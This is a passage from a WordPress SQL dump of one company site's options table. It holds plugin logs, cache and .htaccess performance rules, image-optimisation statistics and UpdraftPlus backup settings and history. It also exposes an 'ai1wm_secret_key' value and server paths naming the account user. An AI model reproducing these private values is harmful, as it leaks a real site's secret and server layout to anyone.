Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-10-25 15:00:55\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:60:\"Elementor/Upgrades - _v_2_7_1_remove_old_usage_data Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"5c29e723aa14295093c3b0263b6e1a78\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-10-25 15:00:55\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:54:\"Elementor/Upgrades - _v_2_7_1_recalc_usage_data Start \";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-10-25 15:00:55\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:54:\"Elementor/Upgrades - _v_2_7_1_recalc_usage_data Start \";s:4:\"type\";s:4:\"info\";}}s:32:\"92e543392100dd78646f641148d94db6\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-10-25 15:00:56\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:56:\"Elementor/Upgrades - _v_2_7_1_recalc_usage_data Finished\";s:7:\"\0*\0meta\";a:0:{}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-10-25 15:00:56\";}s:7:\"\0*\0args\";a:2:{s:7:\"message\";s:56:\"Elementor/Upgrades - _v_2_7_1_recalc_usage_data Finished\";s:4:\"type\";s:4:\"info\";}}s:32:\"75ef958d21d0899f2f2ab3b56b4b2860\";O:32:\"Elementor\\Core\\Logger\\Items\\Base\":7:{s:7:\"\0*\0date\";s:19:\"2019-10-25 15:00:56\";s:7:\"\0*\0type\";s:4:\"info\";s:10:\"\0*\0message\";s:50:\"Elementor data updater process has been completed.\";s:7:\"\0*\0meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"2.5.14\";s:2:\"to\";s:5:\"2.7.4\";}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-10-25 15:00:56\";}s:7:\"\0*\0args\";a:3:{s:4:\"meta\";a:3:{s:6:\"plugin\";s:9:\"Elementor\";s:4:\"from\";s:6:\"2.5.14\";s:2:\"to\";s:5:\"2.7.4\";}s:7:\"message\";s:50:\"Elementor data updater process has been completed.\";s:4:\"type\";s:4:\"info\";}}s:32:\"648741ac08034c85ee2f24e70b41b246\";O:31:\"Elementor\\Core\\Logger\\Items\\PHP\":9:{s:7:\"\0*\0file\";s:98:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/elementor/modules/safe-mode/module.php\";s:7:\"\0*\0line\";i:107;s:7:\"\0*\0date\";s:19:\"2019-10-25 15:37:50\";s:7:\"\0*\0type\";s:7:\"warning\";s:10:\"\0*\0message\";s:90:\"rmdir(/home/norfaiz/public_html/bintara.com.my/wp-content/mu-plugins): Directory not empty\";s:7:\"\0*\0meta\";a:1:{s:5:\"trace\";a:1:{i:0;a:3:{s:8:\"function\";s:8:\"shutdown\";s:5:\"class\";s:29:\"Elementor\\Core\\Logger\\Manager\";s:4:\"type\";s:2:\"->\";}}}s:8:\"\0*\0times\";i:1;s:14:\"\0*\0times_dates\";a:1:{i:0;s:19:\"2019-10-25 15:37:50\";}s:7:\"\0*\0args\";a:5:{s:4:\"type\";s:7:\"warning\";s:7:\"message\";s:90:\"rmdir(/home/norfaiz/public_html/bintara.com.my/wp-content/mu-plugins): Directory not empty\";s:4:\"file\";s:98:\"/home/norfaiz/public_html/bintara.com.my/wp-content/plugins/elementor/modules/safe-mode/module.php\";s:4:\"line\";i:107;s:5:\"trace\";b:1;}}}','no'),(49383,'wpseo_taxonomy_meta','a:2:{s:8:\"post_tag\";a:1:{i:23;a:2:{s:13:\"wpseo_linkdex\";s:2:\"41\";s:19:\"wpseo_content_score\";s:2:\"30\";}}s:8:\"category\";a:1:{i:4;a:2:{s:13:\"wpseo_linkdex\";s:2:\"37\";s:19:\"wpseo_content_score\";s:2:\"30\";}}}','yes'),(51028,'swift_performance_options','a:162:{s:13:\"settings-mode\";s:6:\"simple\";s:16:\"cookies-disabled\";i:0;s:10:\"whitelabel\";i:0;s:15:\"use-compute-api\";i:0;s:16:\"prebuild-booster\";i:1;s:21:\"disable-admin-notices\";i:0;s:14:\"enable-logging\";i:0;s:8:\"loglevel\";s:1:\"1\";s:8:\"log-path\";s:72:\"/home/norfaiz/public_html/bintara.com.my/wp-content/swift-logs-6b4e2bd0/\";s:26:\"normalize-static-resources\";i:1;s:12:\"dns-prefetch\";i:1;s:15:\"dns-prefetch-js\";i:0;s:20:\"exclude-dns-prefetch\";N;s:14:\"gravatar-cache\";i:0;s:21:\"gravatar-cache-expiry\";i:3600;s:15:\"custom-htaccess\";N;s:19:\"background-requests\";N;s:17:\"disable-heartbeat\";s:0:\"\";s:19:\"heartbeat-frequency\";i:60;s:13:\"limit-wp-cron\";i:100;s:11:\"remote-cron\";i:0;s:9:\"bypass-ga\";i:0;s:14:\"ga-tracking-id\";N;s:12:\"ga-ip-source\";s:11:\"REMOTE_ADDR\";s:15:\"ga-anonymize-ip\";i:0;s:16:\"delay-ga-collect\";i:1;s:16:\"ga-exclude-roles\";N;s:16:\"whitelabel-dummy\";N;s:24:\"optimize-uploaded-images\";N;s:19:\"resize-large-images\";N;s:20:\"keep-original-images\";N;s:10:\"serve-webp\";s:4:\"none\";s:19:\"base64-small-images\";i:0;s:24:\"base64-small-images-size\";s:4:\"1000\";s:27:\"exclude-base64-small-images\";N;s:16:\"lazy-load-images\";i:1;s:17:\"exclude-lazy-load\";N;s:31:\"load-images-on-user-interaction\";i:0;s:23:\"base64-lazy-load-images\";i:1;s:23:\"force-responsive-images\";i:0;s:19:\"smart-youtube-embed\";i:0;s:16:\"lazyload-iframes\";i:0;s:23:\"exclude-iframe-lazyload\";N;s:32:\"load-iframes-on-user-interaction\";i:0;s:28:\"merge-assets-logged-in-users\";i:0;s:11:\"server-push\";N;s:22:\"optimize-prebuild-only\";i:0;s:21:\"merge-background-only\";i:0;s:13:\"html-auto-fix\";i:1;s:11:\"minify-html\";i:0;s:14:\"disable-emojis\";i:0;s:13:\"limit-threads\";i:0;s:11:\"max-threads\";i:3;s:21:\"dom-parser-max-buffer\";i:1000000;s:13:\"merge-scripts\";i:0;s:13:\"async-scripts\";N;s:30:\"merge-scripts-exlude-3rd-party\";i:0;s:15:\"exclude-scripts\";N;s:22:\"exclude-inline-scripts\";N;s:28:\"exclude-script-localizations\";i:1;s:14:\"minify-scripts\";i:1;s:22:\"use-script-compute-api\";N;s:22:\"proxy-3rd-party-assets\";i:0;s:24:\"include-3rd-party-assets\";N;s:11:\"separate-js\";i:0;s:21:\"inline-merged-scripts\";N;s:17:\"lazy-load-scripts\";N;s:15:\"include-scripts\";N;s:12:\"merge-styles\";i:0;s:12:\"critical-css\";i:1;s:18:\"extra-critical-css\";N;s:16:\"disable-full-css\";i:0;s:12:\"compress-css\";i:0;s:16:\"remove-keyframes\";i:0;s:19:\"inline_critical_css\";i:1;s:15:\"inline_full_css\";i:0;s:12:\"separate-css\";i:0;s:10:\"minify-css\";i:1;s:17:\"bypass-css-import\";i:1;s:30:\"merge-styles-exclude-3rd-party\";i:0;s:14:\"exclude-styles\";N;s:21:\"exclude-inline-styles\";N;s:14:\"include-styles\";N;s:12:\"font-display\";i:0;s:14:\"enable-caching\";i:1;s:12:\"caching-mode\";s:14:\"disk_cache_php\";s:14:\"memcached-host\";s:9:\"localhost\";s:14:\"memcached-port\";s:5:\"11211\";s:10:\"early-load\";i:1;s:10:\"cache-path\";s:58:\"/home/norfaiz/public_html/bintara.com.my/wp-content/cache/\";s:17:\"cache-expiry-mode\";s:9:\"timebased\";s:17:\"cache-expiry-time\";s:5:\"43200\";s:29:\"cache-garbage-collection-time\";s:4:\"1800\";s:27:\"clear-page-cache-after-post\";N;s:32:\"clear-permalink-cache-after-post\";N;s:30:\"enable-caching-logged-in-users\";i:0;s:22:\"shared-logged-in-cache\";i:0;s:14:\"mobile-support\";i:0;s:13:\"browser-cache\";i:1;s:11:\"enable-gzip\";i:1;s:10:\"304-header\";i:0;s:9:\"cache-404\";i:0;s:15:\"dynamic-caching\";i:0;s:26:\"cacheable-dynamic-requests\";N;s:22:\"cacheable-ajax-actions\";N;s:22:\"ajax-cache-expiry-time\";s:4:\"1440\";s:19:\"ignore-query-string\";N;s:19:\"avoid-mixed-content\";N;s:21:\"keep-original-headers\";N;s:22:\"cache-case-insensitive\";N;s:7:\"ajaxify\";N;s:18:\"exclude-post-types\";N;s:13:\"exclude-pages\";N;s:15:\"exclude-strings\";N;s:15:\"exclude-cookies\";N;s:21:\"exclude-content-parts\";N;s:18:\"exclude-useragents\";N;s:16:\"exclude-crawlers\";i:0;s:14:\"exclude-author\";i:1;s:15:\"exclude-archive\";i:0;s:12:\"exclude-rest\";i:1;s:12:\"exclude-feed\";i:1;s:28:\"enable-remote-prebuild-cache\";i:0;s:24:\"automated_prebuild_cache\";i:0;s:14:\"prebuild-speed\";i:5;s:15:\"discover-warmup\";i:0;s:12:\"cache-author\";i:0;s:13:\"cache-archive\";i:1;s:10:\"cache-rest\";i:0;s:10:\"cache-feed\";i:0;s:18:\"varnish-auto-purge\";i:0;s:19:\"custom-varnish-host\";s:0:\"\";s:16:\"appcache-desktop\";i:0;s:21:\"appcache-desktop-mode\";s:9:\"full-site\";s:20:\"appcache-desktop-max\";s:9:\"104857600\";s:31:\"appcache-desktop-included-pages\";N;s:33:\"appcache-desktop-included-strings\";N;s:31:\"appcache-desktop-excluded-pages\";N;s:33:\"appcache-desktop-excluded-strings\";N;s:15:\"appcache-mobile\";i:0;s:20:\"appcache-mobile-mode\";s:9:\"full-site\";s:19:\"appcache-mobile-max\";s:7:\"5242880\";s:30:\"appcache-mobile-included-pages\";N;s:32:\"appcache-mobile-included-strings\";N;s:30:\"appcache-mobile-excluded-pages\";N;s:32:\"appcache-mobile-excluded-strings\";N;s:10:\"enable-cdn\";i:0;s:19:\"cdn-hostname-master\";N;s:19:\"cdn-hostname-slot-1\";N;s:19:\"cdn-hostname-slot-2\";N;s:14:\"enable-cdn-ssl\";i:0;s:23:\"cdn-hostname-master-ssl\";N;s:23:\"cdn-hostname-slot-1-ssl\";N;s:23:\"cdn-hostname-slot-2-ssl\";N;s:14:\"cdn-file-types\";N;s:21:\"cloudflare-auto-purge\";i:0;s:16:\"cloudflare-email\";s:0:\"\";s:18:\"cloudflare-api-key\";s:0:\"\";s:15:\"cloudflare-host\";s:14:\"bintara.com.my\";s:12:\"maxcdn-alias\";N;s:10:\"maxcdn-key\";N;s:13:\"maxcdn-secret\";N;}','yes'),(51032,'swift_performance_rewrites','###BEGIN Swift Performance Lite - d243f25b###\n# ------------------------------------------------------------------------------\n# | Compression                                                                |\n# ------------------------------------------------------------------------------\n<IfModule mod_deflate.c>\n\n    # Force compression for mangled headers.\n    # http://developer.yahoo.com/blogs/ydn/posts/2010/12/pushing-beyond-gzipping\n    <IfModule mod_setenvif.c>\n        <IfModule mod_headers.c>\n            SetEnvIfNoCase ^(Accept-EncodXng|X-cept-Encoding|X{15}|~{15}|-{15})$ ^((gzip|deflate)\\s*,?\\s*)+|[X~-]{4,13}$ HAVE_Accept-Encoding\n            RequestHeader append Accept-Encoding \"gzip,deflate\" env=HAVE_Accept-Encoding\n        </IfModule>\n    </IfModule>\n\n    # Compress all output labeled with one of the following MIME-types\n    # (for Apache versions below 2.3.7, you don\'t need to enable `mod_filter`\n    #  and can remove the `<IfModule mod_filter.c>` and `</IfModule>` lines\n    #  as `AddOutputFilterByType` is still in the core directives).\n    <IfModule mod_filter.c>\n       AddOutputFilterByType DEFLATE \"application/atom+xml\" \\\n                                  \"application/javascript\" \\\n                                  \"application/json\" \\\n                                  \"application/ld+json\" \\\n                                  \"application/manifest+json\" \\\n                                  \"application/rdf+xml\" \\\n                                  \"application/rss+xml\" \\\n                                  \"application/schema+json\" \\\n                                  \"application/vnd.geo+json\" \\\n                                  \"application/vnd.ms-fontobject\" \\\n                                  \"application/x-font-ttf\" \\\n                                  \"application/x-javascript\" \\\n                                  \"application/x-web-app-manifest+json\" \\\n                                  \"application/xhtml+xml\" \\\n                                  \"application/xml\" \\\n                                  \"font/eot\" \\\n                                  \"font/opentype\" \\\n                                  \"image/bmp\" \\\n                                  \"image/svg+xml\" \\\n                                  \"image/vnd.microsoft.icon\" \\\n                                  \"image/x-icon\" \\\n                                  \"text/cache-manifest\" \\\n                                  \"text/css\" \\\n                                  \"text/html\" \\\n                                  \"text/javascript\" \\\n                                  \"text/plain\" \\\n                                  \"text/vcard\" \\\n                                  \"text/vnd.rim.location.xloc\" \\\n                                  \"text/vtt\" \\\n                                  \"text/x-component\" \\\n                                  \"text/x-cross-domain-policy\" \\\n                                  \"text/xml\"\n    </IfModule>\n\n</IfModule>\n\n# ------------------------------------------------------------------------------\n# | Expires headers (for better cache control)                                 |\n# ------------------------------------------------------------------------------\n<IfModule mod_expires.c>\n    ExpiresActive on\n    ExpiresDefault                                      \"access plus 1 month\"\n\n  # CSS\n    ExpiresByType text/css                              \"access plus 1 year\"\n\n  # Data interchange\n    ExpiresByType application/json                      \"access plus 0 seconds\"\n    ExpiresByType application/xml                       \"access plus 0 seconds\"\n    ExpiresByType text/xml                              \"access plus 0 seconds\"\n\n  # Favicon (cannot be renamed!)\n    ExpiresByType image/x-icon                          \"access plus 1 week\"\n\n  # HTML components (HTCs)\n    ExpiresByType text/x-component                      \"access plus 1 month\"\n\n  # HTML\n    ExpiresByType text/html                             \"access plus 0 seconds\"\n\n  # JavaScript\n    ExpiresByType application/javascript                \"access plus 1 year\"\n\n  # Manifest files\n    ExpiresByType application/x-web-app-manifest+json   \"access plus 0 seconds\"\n    ExpiresByType text/cache-manifest                   \"access plus 0 seconds\"\n\n  # Media\n    ExpiresByType audio/ogg                             \"access plus 1 month\"\n    ExpiresByType image/gif                             \"access plus 1 month\"\n    ExpiresByType image/jpeg                            \"access plus 1 month\"\n    ExpiresByType image/png                             \"access plus 1 month\"\n    ExpiresByType video/mp4                             \"access plus 1 month\"\n    ExpiresByType video/ogg                             \"access plus 1 month\"\n    ExpiresByType video/webm                            \"access plus 1 month\"\n\n  # Web feeds\n    ExpiresByType application/atom+xml                  \"access plus 1 hour\"\n    ExpiresByType application/rss+xml                   \"access plus 1 hour\"\n\n  # Web fonts\n    ExpiresByType application/font-woff                 \"access plus 1 month\"\n    ExpiresByType application/font-woff2                \"access plus 1 month\"\n    ExpiresByType application/vnd.ms-fontobject         \"access plus 1 month\"\n    ExpiresByType application/x-font-ttf                \"access plus 1 month\"\n    ExpiresByType font/opentype                         \"access plus 1 month\"\n    ExpiresByType image/svg+xml                         \"access plus 1 month\"\n\n</IfModule>\n\n# ----------------------------------------------------------------------\n# CORS-enabled images (@crossorigin)\n# ----------------------------------------------------------------------\n# Send CORS headers if browsers request them; enabled by default for images.\n# developer.mozilla.org/en/CORS_Enabled_Image\n# blog.chromium.org/2011/07/using-cross-domain-images-in-webgl-and.html\n# hacks.mozilla.org/2011/11/using-cors-to-load-webgl-textures-from-cross-domain-images/\n# wiki.mozilla.org/Security/Reviews/crossoriginAttribute\n<IfModule mod_setenvif.c>\n  <IfModule mod_headers.c>\n    # mod_headers, y u no match by Content-Type?!\n    <FilesMatch \"\\.(gif|png|jpe?g|svg|svgz|ico|webp)$\">\n      SetEnvIf Origin \":\" IS_CORS\n      Header set Access-Control-Allow-Origin \"*\" env=IS_CORS\n    </FilesMatch>\n  </IfModule>\n</IfModule>\n# ----------------------------------------------------------------------\n# Webfont access\n# ----------------------------------------------------------------------\n# Allow access from all domains for webfonts.\n# Alternatively you could only whitelist your\n# subdomains like \"subdomain.example.com\".\n<IfModule mod_headers.c>\n  <FilesMatch \"\\.(ttf|ttc|otf|eot|woff|woff2|font.css|css|js)$\">\n    Header set Access-Control-Allow-Origin \"*\"\n  </FilesMatch>\n</IfModule>\n\n###END Swift Performance Lite - d243f25b###\n','no'),(59220,'wpdp_swift_performance_db_version','1.6','yes'),(51035,'swift-perforomance-initial-setup-wizard','1','yes'),(59557,'_transient_is_multi_author','0','yes'),(5260,'dir_smush_stats','a:2:{s:9:\"dir_smush\";a:2:{s:5:\"total\";s:1:\"0\";s:9:\"optimised\";i:0;}s:14:\"combined_stats\";a:0:{}}','no'),(5253,'wp-smush-resize_sizes','a:2:{s:5:\"width\";i:2048;s:6:\"height\";i:2048;}','yes'),(5259,'smush_global_stats','a:9:{s:11:\"size_before\";i:106687880;s:10:\"size_after\";i:95875577;s:7:\"percent\";d:10.0999999999999996447286321199499070644378662109375;s:5:\"human\";s:7:\"10.3 MB\";s:5:\"bytes\";i:10812303;s:12:\"total_images\";i:3026;s:12:\"resize_count\";i:0;s:14:\"resize_savings\";i:0;s:18:\"conversion_savings\";i:0;}','no'),(5252,'wp-smush-image_sizes','a:7:{i:0;s:9:\"thumbnail\";i:1;s:6:\"medium\";i:2;s:5:\"large\";i:3;s:19:\"onepress-blog-small\";i:4;s:14:\"onepress-small\";i:5;s:15:\"onepress-medium\";i:6;s:12:\"medium_large\";}','yes'),(23127,'_amn_wpforms-lite_to_check','1573173347','yes'),(5246,'wp-smush-settings','a:15:{s:11:\"networkwide\";b:0;s:4:\"auto\";b:1;s:5:\"lossy\";b:0;s:10:\"strip_exif\";b:1;s:6:\"resize\";b:0;s:9:\"detection\";b:0;s:8:\"original\";b:0;s:6:\"backup\";b:0;s:10:\"png_to_jpg\";b:0;s:7:\"nextgen\";b:0;s:2:\"s3\";b:0;s:9:\"gutenberg\";b:0;s:3:\"cdn\";b:0;s:11:\"auto_resize\";b:0;s:4:\"webp\";b:1;}','yes'),(5233,'jpsq_sync_checkout','0:0','no'),(5232,'jetpack_callables_sync_checksum','a:37:{s:18:\"wp_max_upload_size\";i:704274786;s:15:\"is_main_network\";i:734881840;s:13:\"is_multi_site\";i:4261170317;s:17:\"main_network_site\";i:979574749;s:8:\"site_url\";i:1257149915;s:8:\"home_url\";i:1257149915;s:16:\"single_user_site\";i:734881840;s:7:\"updates\";i:3425443202;s:28:\"has_file_system_write_access\";i:4261170317;s:21:\"is_version_controlled\";i:734881840;s:10:\"taxonomies\";i:943626149;s:10:\"post_types\";i:3729510;s:18:\"post_type_features\";i:4274363037;s:10:\"shortcodes\";i:629080068;s:27:\"rest_api_allowed_post_types\";i:503776097;s:32:\"rest_api_allowed_public_metadata\";i:223132457;s:24:\"sso_is_two_step_required\";i:734881840;s:26:\"sso_should_hide_login_form\";i:734881840;s:18:\"sso_match_by_email\";i:4261170317;s:21:\"sso_new_user_override\";i:734881840;s:29:\"sso_bypass_default_login_form\";i:734881840;s:10:\"wp_version\";i:367031918;s:11:\"get_plugins\";i:2458984119;s:24:\"get_plugins_action_links\";i:223132457;s:14:\"active_modules\";i:223132457;s:16:\"hosting_provider\";i:769900095;s:6:\"locale\";i:110763218;s:13:\"site_icon_url\";i:734881840;s:5:\"roles\";i:3762031363;s:8:\"timezone\";i:735618121;s:24:\"available_jetpack_blocks\";i:223132457;s:12:\"network_name\";i:2690312253;s:31:\"network_allow_new_registrations\";i:826414027;s:21:\"network_add_new_users\";i:734881840;s:25:\"network_site_upload_space\";i:808273962;s:25:\"network_upload_file_types\";i:801778294;s:35:\"network_enable_administration_menus\";i:223132457;}','no'),(2051,'ai1wm_secret_key','cUSvA5LgtUe6','yes'),(2072,'updraftplus_version','1.16.12','yes'),(2073,'updraft_updraftvault','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-0c4e2d9deef2b58efba6ba64beed5b18\";a:3:{s:5:\"token\";s:0:\"\";s:5:\"email\";s:0:\"\";s:5:\"quota\";i:-1;}}}','yes'),(2074,'updraft_dropbox','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-5b305ea09bda296db2baa2e1fb8c4999\";a:4:{s:6:\"appkey\";s:0:\"\";s:6:\"secret\";s:0:\"\";s:6:\"folder\";s:0:\"\";s:15:\"tk_access_token\";s:1:\"0\";}}}','yes'),(4886,'updraft_split_every','400','yes'),(4887,'updraft_delete_local','1','yes'),(4888,'updraft_dir','updraft','yes'),(4889,'updraft_service','','yes'),(4890,'updraft_debug_mode','0','yes'),(4884,'updraft_include_others','1','yes'),(4885,'updraft_include_others_exclude','upgrade,cache,updraft,backup*,*backups,mysql.sql,debug.log','yes'),(2075,'updraft_s3','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-ae5b8e348d1d890b36b3fbea87fbc0e7\";a:3:{s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";}}}','yes'),(2076,'updraft_cloudfiles','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-d41496b575352f3b1521efebbb4a4d3c\";a:5:{s:7:\"authurl\";s:35:\"https://auth.api.rackspacecloud.com\";s:6:\"region\";s:3:\"DFW\";s:4:\"user\";s:0:\"\";s:6:\"apikey\";s:0:\"\";s:4:\"path\";s:0:\"\";}}}','yes'),(2077,'updraft_googledrive','a:2:{s:7:\"version\";i:1;s:8:\"settings\";a:1:{s:34:\"s-f41033b0eecfb12873e79047e67583ac\";a:4:{s:8:\"clientid\";s:0:\"\";s:6:\"secret\";s:0:\"\";s:5:\"token\";s:0:\"\";s:6:\"folder\";s:11:\"UpdraftPlus\";}}}','yes'),(2078,'updraft_onedrive','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(2079,'updraft_ftp','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-5ffdb5251fb6f89a929ffe72c440387f\";a:5:{s:4:\"host\";s:0:\"\";s:4:\"user\";s:0:\"\";s:4:\"pass\";s:0:\"\";s:4:\"path\";s:0:\"\";s:7:\"passive\";s:1:\"1\";}}}','yes'),(2080,'updraft_azure','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(4883,'updraft_include_uploads_exclude','backup*,*backups,backwpup*,wp-clone,snapshots','yes'),(2081,'updraft_sftp','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(4882,'updraft_include_uploads','1','yes'),(2082,'updraft_googlecloud','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(4881,'updraft_include_themes','1','yes'),(2083,'updraft_backblaze','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(4880,'updraft_include_plugins','1','yes'),(2084,'updraft_webdav','a:1:{s:7:\"version\";s:1:\"1\";}','yes'),(2085,'updraft_s3generic','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-9d67ea7a86bad18f67ce5c2539de0ba4\";a:4:{s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";s:8:\"endpoint\";s:0:\"\";}}}','yes'),(2086,'updraft_openstack','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-e90abace20aa60876244e689587cffbb\";a:6:{s:7:\"authurl\";s:0:\"\";s:6:\"tenant\";s:0:\"\";s:6:\"region\";s:0:\"\";s:4:\"user\";s:0:\"\";s:8:\"password\";s:0:\"\";s:4:\"path\";s:0:\"\";}}}','yes'),(2087,'updraft_dreamobjects','a:2:{s:7:\"version\";s:1:\"1\";s:8:\"settings\";a:1:{s:34:\"s-c9af923d5c33836f5d8af3055184d727\";a:4:{s:9:\"accesskey\";s:0:\"\";s:9:\"secretkey\";s:0:\"\";s:4:\"path\";s:0:\"\";s:8:\"endpoint\";s:26:\"objects-us-east-1.dream.io\";}}}','yes'),(2088,'updraftplus_tour_cancelled_on','premium','yes'),(2089,'updraft_lastmessage','The backup apparently succeeded and is now complete (Nov 14 20:00:22)','yes'),(2090,'updraftplus_locked_fd','1','no'),(2091,'updraftplus_last_lock_time_fd','2019-11-14 11:12:38','no'),(2092,'updraftplus_semaphore_fd','1','no'),(2093,'updraft_last_scheduled_fd','1573729958','yes'),(2094,'updraft_backup_history','a:1:{i:1573729957;a:19:{s:7:\"plugins\";a:1:{i:0;s:79:\"backup_2019-11-14-1912_Bintara_Solutions_Sdn_Bhd_BINTA_6c2def23adc3-plugins.zip\";}s:12:\"plugins-size\";i:66857545;s:6:\"themes\";a:1:{i:0;s:78:\"backup_2019-11-14-1912_Bintara_Solutions_Sdn_Bhd_BINTA_6c2def23adc3-themes.zip\";}s:11:\"themes-size\";i:2444495;s:7:\"uploads\";a:1:{i:0;s:79:\"backup_2019-11-14-1912_Bintara_Solutions_Sdn_Bhd_BINTA_6c2def23adc3-uploads.zip\";}s:12:\"uploads-size\";i:188069287;s:6:\"others\";a:1:{i:0;s:78:\"backup_2019-11-14-1912_Bintara_Solutions_Sdn_Bhd_BINTA_6c2def23adc3-others.zip\";}s:11:\"others-size\";i:9748595;s:2:\"db\";s:73:\"backup_2019-11-14-1912_Bintara_Solutions_Sdn_Bhd_BINTA_6c2def23adc3-db.gz\";s:7:\"db-size\";i:4092459;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"650f3097aad2cc876759418194323e6805f3d0ab\";s:7:\"themes0\";s:40:\"78cb1aa65f0060bb6285103ff6a451b0793a1993\";s:8:\"uploads0\";s:40:\"1090f4366a75c93991b49d7f2d9b7b2aba0ffc69\";s:7:\"others0\";s:40:\"da6d22fa41d3fa804ad49c535f325a0470dadede\";s:3:\"db0\";s:40:\"5dae425d479349cf3e356b2123e67354b867d63a\";}s:6:\"sha256\";a:5:{s:8:\"plugins0\";s:64:\"851ef44824c6db76ca4ad18055620ce9e659206b946adef0acb2ade8bfd5d889\";s:7:\"themes0\";s:64:\"fc8bb2a28255416b0e6d154f022344168fc172e9736751af7d816fa0e22120dd\";s:8:\"uploads0\";s:64:\"e915df662afc5dd7a879ca45f4841f2e11ccc2fc2fee48911a989f8b5cd97226\";s:7:\"others0\";s:64:\"c365a8d980cb25efa2efd20450b2df2d08a099c8f26b8cd6c281ab924e0c6ed5\";s:3:\"db0\";s:64:\"0037f7cfafc0bbfa6f87a20604abecd08a093729558029fc924dd180038b2cea\";}}s:5:\"nonce\";s:12:\"6c2def23adc3\";s:7:\"service\";a:1:{i:0;s:4:\"none\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1573729959;s:6:\"themes\";i:1573731115;s:7:\"uploads\";i:1573732169;s:6:\"others\";i:1573732751;}s:18:\"created_by_version\";s:7:\"1.16.17\";s:21:\"last_saved_by_version\";s:7:\"1.16.17\";s:12:\"is_multisite\";b:1;}}','no'),(2095,'updraft_last_backup','a:5:{s:11:\"backup_time\";i:1573729957;s:12:\"backup_array\";a:11:{s:7:\"plugins\";a:1:{i:0;s:79:\"backup_2019-11-14-1912_Bintara_Solutions_Sdn_Bhd_BINTA_6c2def23adc3-plugins.zip\";}s:12:\"plugins-size\";i:66857545;s:6:\"themes\";a:1:{i:0;s:78:\"backup_2019-11-14-1912_Bintara_Solutions_Sdn_Bhd_BINTA_6c2def23adc3-themes.zip\";}s:11:\"themes-size\";i:2444495;s:7:\"uploads\";a:1:{i:0;s:79:\"backup_2019-11-14-1912_Bintara_Solutions_Sdn_Bhd_BINTA_6c2def23adc3-uploads.zip\";}s:12:\"uploads-size\";i:188069287;s:6:\"others\";a:1:{i:0;s:78:\"backup_2019-11-14-1912_Bintara_Solutions_Sdn_Bhd_BINTA_6c2def23adc3-others.zip\";}s:11:\"others-size\";i:9748595;s:2:\"db\";s:73:\"backup_2019-11-14-1912_Bintara_Solutions_Sdn_Bhd_BINTA_6c2def23adc3-db.gz\";s:7:\"db-size\";i:4092459;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:5:{s:8:\"plugins0\";s:40:\"650f3097aad2cc876759418194323e6805f3d0ab\";s:7:\"themes0\";s:40:\"78cb1aa65f0060bb6285103ff6a451b0793a1993\";s:8:\"uploads0\";s:40:\"1090f4366a75c93991b49d7f2d9b7b2aba0ffc69\";s:7:\"others0\";s:40:\"da6d22fa41d3fa804ad49c535f325a0470dadede\";s:3:\"db0\";s:40:\"5dae425d479349cf3e356b2123e67354b867d63a\";}s:6:\"sha256\";a:5:{s:8:\"plugins0\";s:64:\"851ef44824c6db76ca4ad18055620ce9e659206b946adef0acb2ade8bfd5d889\";s:7:\"themes0\";s:64:\"fc8bb2a28255416b0e6d154f022344168fc172e9736751af7d816fa0e22120dd\";s:8:\"uploads0\";s:64:\"e915df662afc5dd7a879ca45f4841f2e11ccc2fc2fee48911a989f8b5cd97226\";s:7:\"others0\";s:64:\"c365a8d980cb25efa2efd20450b2df2d08a099c8f26b8cd6c281ab924e0c6ed5\";s:3:\"db0\";s:64:\"0037f7cfafc0bbfa6f87a20604abecd08a093729558029fc924dd180038b2cea\";}}}s:7:\"success\";i:1;s:6:\"errors\";a:0:{}s:12:\"backup_nonce\";s:12:\"6c2def23adc3\";}','yes'),(7044,'wpseo-gsc-issues-smartphone_only-access_denied','a:1:{i:0;a:6:{s:3:\"url\";s:15:\"/comments/feed/\";s:14:\"first_detected\";s:16:\"December 9, 2018\";s:18:\"first_detected_raw\";s:10:\"1544359145\";s:12:\"last_crawled\";s:16:\"December 9, 